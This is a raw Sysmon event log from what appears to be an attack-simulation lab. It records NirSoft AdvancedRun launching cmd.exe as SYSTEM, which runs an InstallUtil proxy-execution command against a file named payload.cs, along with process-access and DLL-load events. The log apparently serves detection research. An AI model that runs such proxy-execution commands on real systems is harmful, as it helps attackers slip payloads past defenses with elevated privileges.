734700x80000000000000004067379Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.595{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067378Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.594{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067377Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.593{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067376Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.593{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067375Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.592{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067374Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.592{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004067373Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.591{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004067372Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.588{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004067371Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.586{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004067370Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:08:57.579{834264DD-12D9-61EB-4608-000000002702}3056C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runC:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000004063702Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.939{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 154100x80000000000000004063697Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.932{834264DD-11B5-61EB-1808-000000002702}1824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\System32\cmd.exe" /c c:\temp\installut.exe /logfile= /LogToConsole=false /U c:\temp\payload.csC:\Windows\System32\NT AUTHORITY\SYSTEM{834264DD-DAE4-61EA-E703-000000000000}0x3e72SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.cfg /runATTACKRANGE\Administrator 10341000x80000000000000004063696Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\seclogon.dll+1404|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.930{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-11B5-61EB-1708-000000002702}1296C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004063694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063693Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.929{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.927{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004063690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.926{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.925{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:04:05.924{834264DD-11B5-61EB-1708-000000002702}12963796C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004063685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 